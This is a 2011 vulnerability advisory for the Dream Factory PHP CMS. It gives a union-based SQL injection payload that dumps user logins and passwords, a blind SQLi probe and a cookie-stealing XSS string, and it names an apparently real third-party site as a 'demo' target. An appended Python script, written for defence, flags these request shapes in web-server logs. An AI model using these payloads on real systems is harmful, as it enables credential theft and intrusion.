Dream Factory Cross Site Scripting / SQL Injection

2011-08-31T00:00:00
ID PACKETSTORM:104653
Type packetstorm
Reporter OuTLaWz
Modified 2011-08-31T00:00:00

Description

                                        
                                            `===================================================================  
Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability  
===================================================================  
  
  
Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)  
[+] Site : Inj3ct0r.com  
[+] Support e-mail : submit[at]inj3ct0r.com  
I'm The_Exploited member from Inj3ct0r Team  
  
[+] Discovered By: The_Exploited  
  
@Title: Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability  
  
@Author: OuTLaWz aka The_Exploited aka l3d aka Spoof  
  
@Mail: spoof@live.it  
  
@Yahoo Messenger: user_31337@yahoo.com  
  
@Site: WwW.SecuritySpl0its.CoM  
  
@Path: http://www.mysite.com/index.php?news_id=[SQL] or [Blind SQL] or [XSS]  
  
@SQL Injection: -null+union+all+select+null,null,concat(login,0x3a,password),null,null,null,null,null+from+user  
  
@Blind SQL Injection: +and+1=1 - +and+1=2  
  
@XSS: "><script>alert(document.cookie)</script>  
  
@Demo: http://www.fipavterni.it/index.php?news_id=[SQL] or [Blind SQL] or [XSS]  
  
@Platform: PHP  
  
@CMS Version: All  
  
@CMS Download: http://www.dreamfactorydesign.it/  
  
  
# 1337day.com [2010-07-11]  
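All three request shapes listed above put non-digit characters into `news_id`, so checking that the parameter is a plain integer flags them in web-server logs; the same rule is the input validation the application should enforce. The script below is an added example, not part of the advisory or the vendor's code: the log lines are constructed, and the combined log format and the function names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample (not from the advisory): addresses, times and sizes are made up.
SAMPLE_LOG = '''\
198.51.100.7 - - [31/Aug/2011:10:00:01 +0000] "GET /index.php?news_id=12 HTTP/1.1" 200 5120
198.51.100.9 - - [31/Aug/2011:10:00:05 +0000] "GET /index.php?news_id=12+and+1=1 HTTP/1.1" 200 5120
198.51.100.9 - - [31/Aug/2011:10:00:06 +0000] "GET /index.php?news_id=12+and+1=2 HTTP/1.1" 200 1034
198.51.100.9 - - [31/Aug/2011:10:00:09 +0000] "GET /index.php?news_id=-null+union+all+select+null,null HTTP/1.1" 200 4980
198.51.100.4 - - [31/Aug/2011:10:00:12 +0000] "GET /index.php?news_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300
198.51.100.7 - - [31/Aug/2011:10:00:20 +0000] "GET /index.php?page=contact HTTP/1.1" 200 2210
'''

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return None for a plain integer id, else a label for the anomaly."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if re.search(r"[<>\"']", value):
        return "markup"          # HTML metacharacters: the XSS shape
    if re.search(r"\b(union|select|and|or)\b", value, re.IGNORECASE):
        return "sql"             # SQL keywords: the injection shapes
    return "non-integer"         # anything else that is not an id


def scan(log_text, param="news_id"):
    """Yield (client, decoded value, label) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):   # values are URL-decoded here
            label = classify(value)
            if label:
                findings.append((client, value, label))
    return findings


if __name__ == "__main__":
    for client, value, label in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value!r}")
```

A paired true/false probe from one client (the two `and 1=…` lines, with different response sizes) is the pattern worth alerting on first.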